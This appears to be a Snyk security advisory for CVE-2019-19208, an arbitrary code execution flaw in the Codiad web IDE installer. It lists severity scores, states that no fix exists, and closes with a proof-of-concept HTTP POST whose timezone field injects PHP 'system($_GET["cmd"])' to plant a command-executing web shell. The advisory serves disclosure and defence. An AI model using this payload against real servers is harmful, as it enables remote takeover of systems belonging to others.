Arbitrary Code Execution Affecting codiad/codiad package, versions >=0.0.0
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Mature
EPSS
34.67% (98th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-CODIADCODIAD-560364
- published 16 Mar 2020
- disclosed 16 Mar 2020
- credit Tobias Neitzel of usd AG
Introduced: 16 Mar 2020
CVE-2019-19208 Open this link in a new tabHow to fix?
There is no fixed version for codiad/codiad
.
Overview
codiad/codiad is a web-based IDE framework with a small footprint and minimal requirements.
Affected versions of this package are vulnerable to Arbitrary Code Execution. Allows PHP Code injection.
PoC by Tobias Neitzel
POST /components/install/process.php HTTP/1.1
Host: codiad.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 170
path=/var/www/html/data&username=/tmp/dada&password=/tmp/dada&project_name=/tmp/dada&project_path=/var/www/html/data/data&timezone='")%3b+system($_GET["cmd"])%3b+print("'